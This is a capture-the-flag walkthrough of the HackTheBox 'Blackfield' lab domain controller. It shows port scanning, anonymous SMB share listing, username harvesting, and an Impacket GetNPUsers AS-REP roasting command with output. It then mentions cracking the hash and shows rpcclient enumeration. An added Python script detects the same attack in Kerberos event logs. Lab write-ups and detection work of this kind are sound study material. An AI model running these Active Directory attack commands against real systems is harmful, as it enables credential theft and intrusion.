HackTheBox — Blackfield

Summary

It's a Windows machine rated Hard, with IP 10.10.10.192.
Let's get started!

Enumeration

root@strike:~# nmap -sC -sV 10.10.10.192
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-12 14:09 EET
Nmap scan report for blackfield.htb (10.10.10.192)
Host is up (0.12s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-12 19:15:30Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=6/12%Time=5EE37098%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h05m34s, deviation: 0s, median: 7h05m34s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-12 21:17:49
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.13 seconds
root@strike:~#

So we have many ports open: 53, 88, 135, 389 and more.
I used enum4linux to get more info.

root@strike:~# enum4linux blackfield.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jun 12 14:18:36 2020

==========================
| Target Information |
==========================
Target ........... blackfield.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


======================================================
| Enumerating Workgroup/Domain on blackfield.htb |
======================================================
[E] Can't find workgroup/domain


==============================================
| Nbtstat Information for blackfield.htb |
==============================================
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
Looking up status of 10.10.10.192
No reply from 10.10.10.192

=======================================
| Session Check on blackfield.htb |
=======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server blackfield.htb allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

=============================================
| Getting domain SID for blackfield.htb |
=============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
Domain Name: BLACKFIELD
Domain Sid: S-1-5-21-4194615774-2175524697-3563712290
[+] Host is part of a domain (not a workgroup)

========================================
| OS information on blackfield.htb |
========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for blackfield.htb from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for blackfield.htb from srvinfo:
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

===============================
| Users on blackfield.htb |
===============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

===========================================
| Share Enumeration on blackfield.htb |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
WARNING: The "encrypt passwords" option is deprecated
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
WARNING: The "null passwords" option is deprecated

Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on blackfield.htb

root@strike:~#

So we got the domain name: BLACKFIELD.
I tried to log in anonymously with smbclient.

I found 2 shares: forensic and profiles$.

I tried to list the contents of the forensic share but got Access Denied.

I tried to list the contents of profiles$ and it worked:

root@strike:~# smbclient -U " "%" "  \\\\10.10.10.192\\profiles$
WARNING: The "encrypt passwords" option is deprecated
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
WARNING: The "null passwords" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jun 3 18:47:12 2020
.. D 0 Wed Jun 3 18:47:12 2020
AAlleni D 0 Wed Jun 3 18:47:11 2020
ABarteski D 0 Wed Jun 3 18:47:11 2020
ABekesz D 0 Wed Jun 3 18:47:11 2020
ABenzies D 0 Wed Jun 3 18:47:11 2020
ABiemiller D 0 Wed Jun 3 18:47:11 2020
AChampken D 0 Wed Jun 3 18:47:11 2020
ACheretei D 0 Wed Jun 3 18:47:11 2020
ACsonaki D 0 Wed Jun 3 18:47:11 2020
AHigchens D 0 Wed Jun 3 18:47:11 2020
AJaquemai D 0 Wed Jun 3 18:47:11 2020
AKlado D 0 Wed Jun 3 18:47:11 2020
AKoffenburger D 0 Wed Jun 3 18:47:11 2020
AKollolli D 0 Wed Jun 3 18:47:11 2020
AKruppe D 0 Wed Jun 3 18:47:11 2020
AKubale D 0 Wed Jun 3 18:47:11 2020
ALamerz D 0 Wed Jun 3 18:47:11 2020
AMaceldon D 0 Wed Jun 3 18:47:11 2020
AMasalunga D 0 Wed Jun 3 18:47:11 2020
ANavay D 0 Wed Jun 3 18:47:11 2020
ANesterova D 0 Wed Jun 3 18:47:11 2020
ANeusse D 0 Wed Jun 3 18:47:11 2020
AOkleshen D 0 Wed Jun 3 18:47:11 2020
APustulka D 0 Wed Jun 3 18:47:11 2020
ARotella D 0 Wed Jun 3 18:47:11 2020
ASanwardeker D 0 Wed Jun 3 18:47:11 2020
AShadaia D 0 Wed Jun 3 18:47:11 2020
ASischo D 0 Wed Jun 3 18:47:11 2020
ASpruce D 0 Wed Jun 3 18:47:11 2020
ATakach D 0 Wed Jun 3 18:47:11 2020
ATaueg D 0 Wed Jun 3 18:47:11 2020
ATwardowski D 0 Wed Jun 3 18:47:11 2020
audit2020 D 0 Wed Jun 3 18:47:11 2020
AWangenheim D 0 Wed Jun 3 18:47:11 2020
AWorsey D 0 Wed Jun 3 18:47:11 2020
AZigmunt D 0 Wed Jun 3 18:47:11 2020
BBakajza D 0 Wed Jun 3 18:47:11 2020
BBeloucif D 0 Wed Jun 3 18:47:11 2020
BCarmitcheal D 0 Wed Jun 3 18:47:11 2020
BConsultant D 0 Wed Jun 3 18:47:11 2020
BErdossy D 0 Wed Jun 3 18:47:11 2020
BGeminski D 0 Wed Jun 3 18:47:11 2020
BLostal D 0 Wed Jun 3 18:47:11 2020
BMannise D 0 Wed Jun 3 18:47:11 2020
BNovrotsky D 0 Wed Jun 3 18:47:11 2020
BRigiero D 0 Wed Jun 3 18:47:11 2020
BSamkoses D 0 Wed Jun 3 18:47:11 2020
BZandonella D 0 Wed Jun 3 18:47:11 2020
CAcherman D 0 Wed Jun 3 18:47:12 2020
CAkbari D 0 Wed Jun 3 18:47:12 2020
CAldhowaihi D 0 Wed Jun 3 18:47:12 2020
CArgyropolous D 0 Wed Jun 3 18:47:12 2020
CDufrasne D 0 Wed Jun 3 18:47:12 2020
CGronk D 0 Wed Jun 3 18:47:11 2020
Chiucarello D 0 Wed Jun 3 18:47:11 2020
Chiuccariello D 0 Wed Jun 3 18:47:12 2020
CHoytal D 0 Wed Jun 3 18:47:12 2020
CKijauskas D 0 Wed Jun 3 18:47:12 2020
CKolbo D 0 Wed Jun 3 18:47:12 2020
CMakutenas D 0 Wed Jun 3 18:47:12 2020
CMorcillo D 0 Wed Jun 3 18:47:11 2020
CSchandall D 0 Wed Jun 3 18:47:12 2020
CSelters D 0 Wed Jun 3 18:47:12 2020
CTolmie D 0 Wed Jun 3 18:47:12 2020
DCecere D 0 Wed Jun 3 18:47:12 2020
DChintalapalli D 0 Wed Jun 3 18:47:12 2020
DCwilich D 0 Wed Jun 3 18:47:12 2020
DGarbatiuc D 0 Wed Jun 3 18:47:12 2020
DKemesies D 0 Wed Jun 3 18:47:12 2020
DMatuka D 0 Wed Jun 3 18:47:12 2020
DMedeme D 0 Wed Jun 3 18:47:12 2020
DMeherek D 0 Wed Jun 3 18:47:12 2020
DMetych D 0 Wed Jun 3 18:47:12 2020
DPaskalev D 0 Wed Jun 3 18:47:12 2020
DPriporov D 0 Wed Jun 3 18:47:12 2020
DRusanovskaya D 0 Wed Jun 3 18:47:12 2020
DVellela D 0 Wed Jun 3 18:47:12 2020
DVogleson D 0 Wed Jun 3 18:47:12 2020
DZwinak D 0 Wed Jun 3 18:47:12 2020
EBoley D 0 Wed Jun 3 18:47:12 2020
EEulau D 0 Wed Jun 3 18:47:12 2020
EFeatherling D 0 Wed Jun 3 18:47:12 2020
EFrixione D 0 Wed Jun 3 18:47:12 2020
EJenorik D 0 Wed Jun 3 18:47:12 2020
EKmilanovic D 0 Wed Jun 3 18:47:12 2020
ElKatkowsky D 0 Wed Jun 3 18:47:12 2020
EmaCaratenuto D 0 Wed Jun 3 18:47:12 2020
EPalislamovic D 0 Wed Jun 3 18:47:12 2020
EPryar D 0 Wed Jun 3 18:47:12 2020
ESachhitello D 0 Wed Jun 3 18:47:12 2020
ESariotti D 0 Wed Jun 3 18:47:12 2020
ETurgano D 0 Wed Jun 3 18:47:12 2020
EWojtila D 0 Wed Jun 3 18:47:12 2020
FAlirezai D 0 Wed Jun 3 18:47:12 2020
FBaldwind D 0 Wed Jun 3 18:47:12 2020
FBroj D 0 Wed Jun 3 18:47:12 2020
FDeblaquire D 0 Wed Jun 3 18:47:12 2020
FDegeorgio D 0 Wed Jun 3 18:47:12 2020
FianLaginja D 0 Wed Jun 3 18:47:12 2020
FLasokowski D 0 Wed Jun 3 18:47:12 2020
FPflum D 0 Wed Jun 3 18:47:12 2020
FReffey D 0 Wed Jun 3 18:47:12 2020
GaBelithe D 0 Wed Jun 3 18:47:12 2020
Gareld D 0 Wed Jun 3 18:47:12 2020
GBatowski D 0 Wed Jun 3 18:47:12 2020
GForshalger D 0 Wed Jun 3 18:47:12 2020
GGomane D 0 Wed Jun 3 18:47:12 2020
GHisek D 0 Wed Jun 3 18:47:12 2020
GMaroufkhani D 0 Wed Jun 3 18:47:12 2020
GMerewether D 0 Wed Jun 3 18:47:12 2020
GQuinniey D 0 Wed Jun 3 18:47:12 2020
GRoswurm D 0 Wed Jun 3 18:47:12 2020
GWiegard D 0 Wed Jun 3 18:47:12 2020
HBlaziewske D 0 Wed Jun 3 18:47:12 2020
HColantino D 0 Wed Jun 3 18:47:12 2020
HConforto D 0 Wed Jun 3 18:47:12 2020
HCunnally D 0 Wed Jun 3 18:47:12 2020
HGougen D 0 Wed Jun 3 18:47:12 2020
HKostova D 0 Wed Jun 3 18:47:12 2020
IChristijr D 0 Wed Jun 3 18:47:12 2020
IKoledo D 0 Wed Jun 3 18:47:12 2020
IKotecky D 0 Wed Jun 3 18:47:12 2020
ISantosi D 0 Wed Jun 3 18:47:12 2020
JAngvall D 0 Wed Jun 3 18:47:12 2020
JBehmoiras D 0 Wed Jun 3 18:47:12 2020
JDanten D 0 Wed Jun 3 18:47:12 2020
JDjouka D 0 Wed Jun 3 18:47:12 2020
JKondziola D 0 Wed Jun 3 18:47:12 2020
JLeytushsenior D 0 Wed Jun 3 18:47:12 2020
JLuthner D 0 Wed Jun 3 18:47:12 2020
JMoorehendrickson D 0 Wed Jun 3 18:47:12 2020
JPistachio D 0 Wed Jun 3 18:47:12 2020
JScima D 0 Wed Jun 3 18:47:12 2020
JSebaali D 0 Wed Jun 3 18:47:12 2020
JShoenherr D 0 Wed Jun 3 18:47:12 2020
JShuselvt D 0 Wed Jun 3 18:47:12 2020
KAmavisca D 0 Wed Jun 3 18:47:12 2020
KAtolikian D 0 Wed Jun 3 18:47:12 2020
KBrokinn D 0 Wed Jun 3 18:47:12 2020
KCockeril D 0 Wed Jun 3 18:47:12 2020
KColtart D 0 Wed Jun 3 18:47:12 2020
KCyster D 0 Wed Jun 3 18:47:12 2020
KDorney D 0 Wed Jun 3 18:47:12 2020
KKoesno D 0 Wed Jun 3 18:47:12 2020
KLangfur D 0 Wed Jun 3 18:47:12 2020
KMahalik D 0 Wed Jun 3 18:47:12 2020
KMasloch D 0 Wed Jun 3 18:47:12 2020
KMibach D 0 Wed Jun 3 18:47:12 2020
KParvankova D 0 Wed Jun 3 18:47:12 2020
KPregnolato D 0 Wed Jun 3 18:47:12 2020
KRasmor D 0 Wed Jun 3 18:47:12 2020
KShievitz D 0 Wed Jun 3 18:47:12 2020
KSojdelius D 0 Wed Jun 3 18:47:12 2020
KTambourgi D 0 Wed Jun 3 18:47:12 2020
KVlahopoulos D 0 Wed Jun 3 18:47:12 2020
KZyballa D 0 Wed Jun 3 18:47:12 2020
LBajewsky D 0 Wed Jun 3 18:47:12 2020
LBaligand D 0 Wed Jun 3 18:47:12 2020
LBarhamand D 0 Wed Jun 3 18:47:12 2020
LBirer D 0 Wed Jun 3 18:47:12 2020
LBobelis D 0 Wed Jun 3 18:47:12 2020
LChippel D 0 Wed Jun 3 18:47:12 2020
LChoffin D 0 Wed Jun 3 18:47:12 2020
LCominelli D 0 Wed Jun 3 18:47:12 2020
LDruge D 0 Wed Jun 3 18:47:12 2020
LEzepek D 0 Wed Jun 3 18:47:12 2020
LHyungkim D 0 Wed Jun 3 18:47:12 2020
LKarabag D 0 Wed Jun 3 18:47:12 2020
LKirousis D 0 Wed Jun 3 18:47:12 2020
LKnade D 0 Wed Jun 3 18:47:12 2020
LKrioua D 0 Wed Jun 3 18:47:12 2020
LLefebvre D 0 Wed Jun 3 18:47:12 2020
LLoeradeavilez D 0 Wed Jun 3 18:47:12 2020
LMichoud D 0 Wed Jun 3 18:47:12 2020
LTindall D 0 Wed Jun 3 18:47:12 2020
LYturbe D 0 Wed Jun 3 18:47:12 2020
MArcynski D 0 Wed Jun 3 18:47:12 2020
MAthilakshmi D 0 Wed Jun 3 18:47:12 2020
MAttravanam D 0 Wed Jun 3 18:47:12 2020
MBrambini D 0 Wed Jun 3 18:47:12 2020
MHatziantoniou D 0 Wed Jun 3 18:47:12 2020
MHoerauf D 0 Wed Jun 3 18:47:12 2020
MKermarrec D 0 Wed Jun 3 18:47:12 2020
MKillberg D 0 Wed Jun 3 18:47:12 2020
MLapesh D 0 Wed Jun 3 18:47:12 2020
MMakhsous D 0 Wed Jun 3 18:47:12 2020
MMerezio D 0 Wed Jun 3 18:47:12 2020
MNaciri D 0 Wed Jun 3 18:47:12 2020
MShanmugarajah D 0 Wed Jun 3 18:47:12 2020
MSichkar D 0 Wed Jun 3 18:47:12 2020
MTemko D 0 Wed Jun 3 18:47:12 2020
MTipirneni D 0 Wed Jun 3 18:47:12 2020
MTonuri D 0 Wed Jun 3 18:47:12 2020
MVanarsdel D 0 Wed Jun 3 18:47:12 2020
NBellibas D 0 Wed Jun 3 18:47:12 2020
NDikoka D 0 Wed Jun 3 18:47:12 2020
NGenevro D 0 Wed Jun 3 18:47:12 2020
NGoddanti D 0 Wed Jun 3 18:47:12 2020
NMrdirk D 0 Wed Jun 3 18:47:12 2020
NPulido D 0 Wed Jun 3 18:47:12 2020
NRonges D 0 Wed Jun 3 18:47:12 2020
NSchepkie D 0 Wed Jun 3 18:47:12 2020
NVanpraet D 0 Wed Jun 3 18:47:12 2020
OBelghazi D 0 Wed Jun 3 18:47:12 2020
OBushey D 0 Wed Jun 3 18:47:12 2020
OHardybala D 0 Wed Jun 3 18:47:12 2020
OLunas D 0 Wed Jun 3 18:47:12 2020
ORbabka D 0 Wed Jun 3 18:47:12 2020
PBourrat D 0 Wed Jun 3 18:47:12 2020
PBozzelle D 0 Wed Jun 3 18:47:12 2020
PBranti D 0 Wed Jun 3 18:47:12 2020
PCapperella D 0 Wed Jun 3 18:47:12 2020
PCurtz D 0 Wed Jun 3 18:47:12 2020
PDoreste D 0 Wed Jun 3 18:47:12 2020
PGegnas D 0 Wed Jun 3 18:47:12 2020
PMasulla D 0 Wed Jun 3 18:47:12 2020
PMendlinger D 0 Wed Jun 3 18:47:12 2020
PParakat D 0 Wed Jun 3 18:47:12 2020
PProvencer D 0 Wed Jun 3 18:47:12 2020
PTesik D 0 Wed Jun 3 18:47:12 2020
PVinkovich D 0 Wed Jun 3 18:47:12 2020
PVirding D 0 Wed Jun 3 18:47:12 2020
PWeinkaus D 0 Wed Jun 3 18:47:12 2020
RBaliukonis D 0 Wed Jun 3 18:47:12 2020
RBochare D 0 Wed Jun 3 18:47:12 2020
RKrnjaic D 0 Wed Jun 3 18:47:12 2020
RNemnich D 0 Wed Jun 3 18:47:12 2020
RPoretsky D 0 Wed Jun 3 18:47:12 2020
RStuehringer D 0 Wed Jun 3 18:47:12 2020
RSzewczuga D 0 Wed Jun 3 18:47:12 2020
RVallandas D 0 Wed Jun 3 18:47:12 2020
RWeatherl D 0 Wed Jun 3 18:47:12 2020
RWissor D 0 Wed Jun 3 18:47:12 2020
SAbdulagatov D 0 Wed Jun 3 18:47:12 2020
SAjowi D 0 Wed Jun 3 18:47:12 2020
SAlguwaihes D 0 Wed Jun 3 18:47:12 2020
SBonaparte D 0 Wed Jun 3 18:47:12 2020
SBouzane D 0 Wed Jun 3 18:47:12 2020
SChatin D 0 Wed Jun 3 18:47:12 2020
SDellabitta D 0 Wed Jun 3 18:47:12 2020
SDhodapkar D 0 Wed Jun 3 18:47:12 2020
SEulert D 0 Wed Jun 3 18:47:12 2020
SFadrigalan D 0 Wed Jun 3 18:47:12 2020
SGolds D 0 Wed Jun 3 18:47:12 2020
SGrifasi D 0 Wed Jun 3 18:47:12 2020
SGtlinas D 0 Wed Jun 3 18:47:12 2020
SHauht D 0 Wed Jun 3 18:47:12 2020
SHederian D 0 Wed Jun 3 18:47:12 2020
SHelregel D 0 Wed Jun 3 18:47:12 2020
SKrulig D 0 Wed Jun 3 18:47:12 2020
SLewrie D 0 Wed Jun 3 18:47:12 2020
SMaskil D 0 Wed Jun 3 18:47:12 2020
Smocker D 0 Wed Jun 3 18:47:12 2020
SMoyta D 0 Wed Jun 3 18:47:12 2020
SRaustiala D 0 Wed Jun 3 18:47:12 2020
SReppond D 0 Wed Jun 3 18:47:12 2020
SSicliano D 0 Wed Jun 3 18:47:12 2020
SSilex D 0 Wed Jun 3 18:47:12 2020
SSolsbak D 0 Wed Jun 3 18:47:12 2020
STousignaut D 0 Wed Jun 3 18:47:12 2020
support D 0 Wed Jun 3 18:47:12 2020
svc_backup D 0 Wed Jun 3 18:47:12 2020
SWhyte D 0 Wed Jun 3 18:47:12 2020
SWynigear D 0 Wed Jun 3 18:47:12 2020
TAwaysheh D 0 Wed Jun 3 18:47:12 2020
TBadenbach D 0 Wed Jun 3 18:47:12 2020
TCaffo D 0 Wed Jun 3 18:47:12 2020
TCassalom D 0 Wed Jun 3 18:47:12 2020
TEiselt D 0 Wed Jun 3 18:47:12 2020
TFerencdo D 0 Wed Jun 3 18:47:12 2020
TGaleazza D 0 Wed Jun 3 18:47:12 2020
TKauten D 0 Wed Jun 3 18:47:12 2020
TKnupke D 0 Wed Jun 3 18:47:12 2020
TLintlop D 0 Wed Jun 3 18:47:12 2020
TMusselli D 0 Wed Jun 3 18:47:12 2020
TOust D 0 Wed Jun 3 18:47:12 2020
TSlupka D 0 Wed Jun 3 18:47:12 2020
TStausland D 0 Wed Jun 3 18:47:12 2020
TZumpella D 0 Wed Jun 3 18:47:12 2020
UCrofskey D 0 Wed Jun 3 18:47:12 2020
UMarylebone D 0 Wed Jun 3 18:47:12 2020
UPyrke D 0 Wed Jun 3 18:47:12 2020
VBublavy D 0 Wed Jun 3 18:47:12 2020
VButziger D 0 Wed Jun 3 18:47:12 2020
VFuscca D 0 Wed Jun 3 18:47:12 2020
VLitschauer D 0 Wed Jun 3 18:47:12 2020
VMamchuk D 0 Wed Jun 3 18:47:12 2020
VMarija D 0 Wed Jun 3 18:47:12 2020
VOlaosun D 0 Wed Jun 3 18:47:12 2020
VPapalouca D 0 Wed Jun 3 18:47:12 2020
WSaldat D 0 Wed Jun 3 18:47:12 2020
WVerzhbytska D 0 Wed Jun 3 18:47:12 2020
WZelazny D 0 Wed Jun 3 18:47:12 2020
XBemelen D 0 Wed Jun 3 18:47:12 2020
XDadant D 0 Wed Jun 3 18:47:12 2020
XDebes D 0 Wed Jun 3 18:47:12 2020
XKonegni D 0 Wed Jun 3 18:47:12 2020
XRykiel D 0 Wed Jun 3 18:47:12 2020
YBleasdale D 0 Wed Jun 3 18:47:12 2020
YHuftalin D 0 Wed Jun 3 18:47:12 2020
YKivlen D 0 Wed Jun 3 18:47:12 2020
YKozlicki D 0 Wed Jun 3 18:47:12 2020
YNyirenda D 0 Wed Jun 3 18:47:12 2020
YPredestin D 0 Wed Jun 3 18:47:12 2020
YSeturino D 0 Wed Jun 3 18:47:12 2020
YSkoropada D 0 Wed Jun 3 18:47:12 2020
YVonebers D 0 Wed Jun 3 18:47:12 2020
YZarpentine D 0 Wed Jun 3 18:47:12 2020
ZAlatti D 0 Wed Jun 3 18:47:12 2020
ZKrenselewski D 0 Wed Jun 3 18:47:12 2020
ZMalaab D 0 Wed Jun 3 18:47:12 2020
ZMiick D 0 Wed Jun 3 18:47:12 2020
ZScozzari D 0 Wed Jun 3 18:47:12 2020
ZTimofeeff D 0 Wed Jun 3 18:47:12 2020
ZWausik D 0 Wed Jun 3 18:47:12 2020

7846143 blocks of size 4096. 3379904 blocks available
smb: \>

So I dumped these directory names into a users.txt file to see whether they could be used as usernames!
With that list, I used the GetNPUsers tool (Impacket) to request Ticket Granting Tickets for any account that does not require Kerberos pre-authentication (AS-REP roasting):

root@strike:~/Desktop# python /root/Desktop/HTB/Windows-EX/getnpusers.py BLACKFIELD.LOCAL/ -usersfile users.txt -format john -outputfile hashes.txt -dc-ip 10.10.10.192
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
ERROR:root:Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
more...
root@strike:~/Desktop#
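From the defender's side, the run above leaves a distinctive trail on the domain controller: one Security event 4768 failure with KDC_ERR_C_PRINCIPAL_UNKNOWN (Status 0x6) per name in the wordlist, then a 4768 success with pre-authentication type 0 for the roastable account. The Python below is an added example, not part of this write-up or of Impacket; the event records, the tester address 10.10.14.5 and the timestamps are constructed.

```python
"""Detection for the AS-REP roasting pattern in Windows Security event 4768.

Added example, not part of the original write-up. It assumes 4768 events
have been exported as flat dicts of their EventData fields (as a SIEM would
give you); SAMPLE_EVENTS is constructed to mirror the GetNPUsers run above:
a burst of KDC_ERR_C_PRINCIPAL_UNKNOWN (Status 0x6) answers to one source,
then one AS-REP issued with no pre-authentication.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed: a few of the profile names from the share listing, as the
# wordlist GetNPUsers would try, plus the tester's (made-up) VPN address.
PROBED_NAMES = ["AAlleni", "ABarteski", "ABekesz", "ABenzies", "ABiemiller",
                "AChampken", "ACheretei", "ACsonaki", "AHigchens", "AJaquemai"]
TESTER_IP = "::ffff:10.10.14.5"
_T0 = datetime(2020, 6, 12, 14, 25, 0)


def _event(offset, user, ip, status, preauth, etype):
    """Build one 4768 record; field names follow the event's XML EventData."""
    return {"time": (_T0 + offset).isoformat(), "TargetUserName": user,
            "IpAddress": ip, "Status": status, "PreAuthType": preauth,
            "TicketEncryptionType": etype}


# Failure audits carry no pre-auth type and an all-ones encryption type.
SAMPLE_EVENTS = [_event(timedelta(seconds=i), n, TESTER_IP, "0x6", "-", "0xffffffff")
                 for i, n in enumerate(PROBED_NAMES)]
SAMPLE_EVENTS += [
    # The roastable account: AS-REP granted with PreAuthType 0, RC4 (0x17) etype.
    _event(timedelta(seconds=10), "support", TESTER_IP, "0x0", "0", "0x17"),
    # A normal logon: PA-ENC-TIMESTAMP pre-auth (type 2) and AES256 (0x12).
    _event(timedelta(minutes=3), "svc_backup", "::ffff:10.10.10.50", "0x0", "2", "0x12"),
    # A single mistyped name from a workstation must not trip the burst rule.
    _event(timedelta(minutes=4), "audit2O2O", "::ffff:10.10.10.51", "0x6", "-", "0xffffffff"),
]


def normalize_ip(addr):
    """Strip the IPv4-mapped prefix Windows writes into the IpAddress field."""
    return addr[7:] if addr.startswith("::ffff:") else addr


def asrep_roast_hits(events):
    """AS-REPs issued without pre-authentication: Status 0x0 and PreAuthType 0.

    Returns (user, source_ip, rc4) tuples; rc4 is True when the ticket was
    RC4-HMAC encrypted, the cheap-to-crack case. The fix is to re-enable
    pre-authentication on the account and rotate its password.
    """
    return [(e["TargetUserName"], normalize_ip(e["IpAddress"]),
             e["TicketEncryptionType"].lower() == "0x17")
            for e in events if e["Status"] == "0x0" and e["PreAuthType"] == "0"]


def enumeration_sources(events, threshold=5, window=timedelta(minutes=5)):
    """Sources that caused >= threshold distinct unknown-principal (0x6)
    failures inside one sliding window. Returns {source_ip: max_distinct}."""
    by_ip = defaultdict(list)
    for e in events:
        if e["Status"] == "0x6":
            by_ip[normalize_ip(e["IpAddress"])].append(
                (datetime.fromisoformat(e["time"]), e["TargetUserName"]))
    flagged = {}
    for ip, probes in by_ip.items():
        probes.sort()
        start = 0
        for end in range(len(probes)):
            while probes[end][0] - probes[start][0] > window:
                start += 1
            names = {u for _, u in probes[start:end + 1]}
            if len(names) >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), len(names))
    return flagged


if __name__ == "__main__":
    print("AS-REP without pre-auth:", asrep_roast_hits(SAMPLE_EVENTS))
    print("Username enumeration sources:", enumeration_sources(SAMPLE_EVENTS))
```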

So I got the hash for the support user.

I cracked the hash with John the Ripper.

After cracking it, I used these credentials to log in with rpcclient.
After logging in, I enumerated users and privileges:

root@strike:~/Desktop# rpcclient 10.10.10.192 -U support
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
Enter WORKGROUP\support's password:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
root@strike:~/Desktop# rpcclient 10.10.10.192 -U support
Unknown parameter encountered: "winbind trusted domains only"
Ignoring unknown parameter "winbind trusted domains only"
Enter WORKGROUP\support's password:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]
rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege 0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3)
SeLockMemoryPrivilege 0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 0:5 (0x0:0x5)
SeMachineAccountPrivilege 0:6 (0x0:0x6)
SeTcbPrivilege 0:7 (0x0:0x7)
SeSecurityPrivilege 0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 0:9 (0x0:0x9)
SeLoadDriverPrivilege 0:10 (0x0:0xa)
SeSystemProfilePrivilege 0:11 (0x0:0xb)
SeSystemtimePrivilege 0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe)
SeCreatePagefilePrivilege 0:15 (0x0:0xf)
SeCreatePermanentPrivilege 0:16 (0x0:0x10)
SeBackupPrivilege 0:17 (0x0:0x11)
SeRestorePrivilege 0:18 (0x0:0x12)
SeShutdownPrivilege 0:19 (0x0:0x13)
SeDebugPrivilege 0:20 (0x0:0x14)
SeAuditPrivilege 0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 0:22 (0x0:0x16)
SeChangeNotifyPrivilege 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 0:24 (0x0:0x18)
SeUndockPrivilege 0:25 (0x0:0x19)
SeSyncAgentPrivilege 0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 0:27 (0x0:0x1b)
SeManageVolumePrivilege 0:28 (0x0:0x1c)
